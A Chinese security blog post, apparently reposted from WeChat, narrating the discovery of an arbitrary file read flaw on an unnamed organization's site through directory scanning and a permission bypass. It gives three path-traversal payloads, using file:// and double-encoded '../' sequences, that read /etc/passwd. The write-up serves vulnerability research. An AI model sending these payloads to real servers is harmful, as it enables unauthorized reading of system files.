某单位一次神奇的任意文件读取漏洞

admin 2024年4月24日01:15:03评论5 views字数 650阅读2分10秒阅读模式

网站的页面是这样的

某单位一次神奇的任意文件读取漏洞

然后通过dirsearch工具对其进行目录扫描,发现有一个/file目录的路径

某单位一次神奇的任意文件读取漏洞

然后又通过字典继续跑,发现了burp的返回包提示说 权限不够
然后通过bypass了一下,就明显返回包数据量变大了
返回包一看,任意文件读取漏洞

某单位一次神奇的任意文件读取漏洞

POC如下:

/file/file%3a//%20//etc/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
/file/file:// //etc/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/file/file:// //etc/../../../../../../../../../../etc/passwd

具体是如何导致的,我的猜想应该是:

在后端代码中第一个 file 可能代表一个特定的命令,这取决于它在原始环境中的使用方式。第二个 file直接指向一个本地文件路径,例如 file:///etc/passwd 会指向本地系统的 /etc/passwd 文件。

原文始发于微信公众号(漏洞谷):某单位一次神奇的任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日01:15:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某单位一次神奇的任意文件读取漏洞http://cn-sec.com/archives/2683587.html

发表评论

匿名网友 填写信息